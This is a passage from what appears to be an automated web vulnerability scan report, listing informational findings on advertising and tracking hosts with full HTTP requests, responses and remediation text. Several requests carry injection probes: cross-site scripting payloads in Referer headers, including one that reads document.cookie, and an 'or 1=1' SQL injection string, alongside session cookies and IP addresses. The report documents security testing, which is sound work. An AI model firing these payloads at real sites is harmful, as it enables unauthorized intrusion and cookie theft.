Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:59:18 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/

GIF89a.............!.......,...........D..;

27.134. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/8/2011+3:06:08+AM; z=4; sid=9ceb3417-a6c7-439a-a223-e9ad8d9afb02; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:42:58 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: z=4; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:42:57 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/

GIF89a.............!.......,...........D..;

27.135. http://voken.eyereturn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; cmggl=1; er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
ETag: W/"147-1285032287000"
Last-Modified: Tue, 21 Sep 2010 01:24:47 GMT
Content-Type: text/html
Content-Length: 147
Date: Sat, 29 Jan 2011 01:41:38 GMT
Connection: close
Server: eyeReturn Ad Serveri 6

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
</head>
<body>
</body>
</html>

27.136. http://widgets.mobilelocalnews.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.mobilelocalnews.com
Path:   /

Request

GET /?uid=42b39fdb198522d2bfc6b1f64cd98365 HTTP/1.1
Host: widgets.mobilelocalnews.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:58 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 8312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Bo
...[SNIP]...

27.137. http://www.moxiesoft.com/tal_products/chat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat.aspx

Request

GET /tal_products/chat.aspx?ac=PPC.B.live chat HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 28 Jan 2011 13:59:24 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

27.138. http://www.paperg.com/jsfb/embed.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:00:05 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

27.139. http://www.parkersoft.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.parkersoft.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; whoson=530-50268.8034574

Response

HTTP/1.1 404 Not Found
Content-Length: 1188
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 13:58:01 GMT

...<html>
<head>
<title>Parker Software</title>
<meta http-equiv="REFRESH" content="3; URL=http://www.email2db.com">
<link rel="stylesheet" type="text/css" href="http://www.email2db.co
...[SNIP]...

27.140. http://www.screenthumbs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 404 Not Found
Content-Length: 1070
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 21:52:15 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#115;&#99;&#114;&#101;&#10
...[SNIP]...

27.141. http://www.screenthumbs.com/inc/nshots.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /inc/nshots.php

Request

GET /inc/nshots.php HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<img style="margin: 0 5px 0 5px;" src="/thumb?appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthomerecent&url=http://angkasawanassociationofmalaysia.blogspot.com" /><img style="margin: 0 5px 0
...[SNIP]...

27.142. http://www.screenthumbs.com/inc/qstats.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /inc/qstats.php

Request

GET /inc/qstats.php HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<table width="100%" border="0" cellspacing="0" cellpadding="3">

<tr>
<td class="bbotdot">14,277,651</td>
<td align="left" class="bbotdot">thumbnails captured</td>

...[SNIP]...

27.143. http://www.screenthumbs.com/tools/js/linkthumbs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /tools/js/linkthumbs.js

Request

GET /tools/js/linkthumbs.js?key=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

var linkthumbs_url = 'http://www.screenthumbs.com/thumb?direct=1&appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome&format=0&width=200&height=150&url=';

var linkthumbs_clsNames = ['', 'type2'];
...[SNIP]...

27.144. http://www.spicefactory.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spicefactory.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.spicefactory.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:47:38 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 337

<HTML>
<HEAD>
</HEAD>

<BODY BGCOLOR="#FFFFFF">

<TABLE ALIGN=CENTER>
<TR>
<TD>
<P ALIGN=JUSTIFY>
<H2>Fehler </H2>
<H1>
Die Datei konnte nicht gefunden werden </H1>
<
...[SNIP]...

28. Content type incorrectly stated
There are 44 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


28.1. http://4c28d6.r.axf8.net/mr/a.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4c28d6.r.axf8.net
Path:   /mr/a.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 18:05:36 GMT

gomez.b1(0,0);

28.2. http://amch.questionmarket.com/adscgen/st.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=791689&site=57634299&code=39823749&randnum=6941413 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b103.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


28.3. http://ar.voicefive.com/b/rc.pli

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p85001580&1296224152232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:15:04 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

28.4. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://assets.nydailynews.com
Path:   /img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: Apache
Content-Length: 69
Cneonction: close
Content-Type: text/html
Content-Language: en
Age: 8
Date: Fri, 28 Jan 2011 14:14:30 GMT
Expires: Fri, 28 Jan 2011 14:14:32 GMT
Connection: keep-alive

/apps/web1/apache2/htdocs/img/2011/01/26/gthmb_no_makeup_menounos.jpg

28.5. http://b.scorecardresearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b.scorecardresearch.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/html; charset=iso-8859-1. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 29 Jan 2011 17:26:10 GMT
Date: Fri, 28 Jan 2011 17:26:10 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=86400
Server: CS

File not found.

28.6. http://b3.mookie1.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:49:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:41:54 GMT
ETag: "1fe03-1cee-bbc5480"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

28.7. http://base.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://base.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=5296924 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG

Response

HTTP/1.1 200 OK
Content-Length: 17314
Content-Type: application/x-javascript
Content-Location: http://base.liveperson.net/lpWeb/default_ALPHA//hcpv/emt/mtag.js?site=5296924
Last-Modified: Sun, 17 Oct 2010 14:38:28 GMT
Accept-Ranges: bytes
ETag: "4de42f686ecb1:112a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 13:59:12 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

28.8. http://base.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://base.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: base.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickACTIVE=1296223153625; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickSiteContainerID_5296924=Secondary1;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 28 Jan 2011 14:11:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRSRACD=JNCEGDPBHJJHHAPHDMHAOKLH; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

28.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

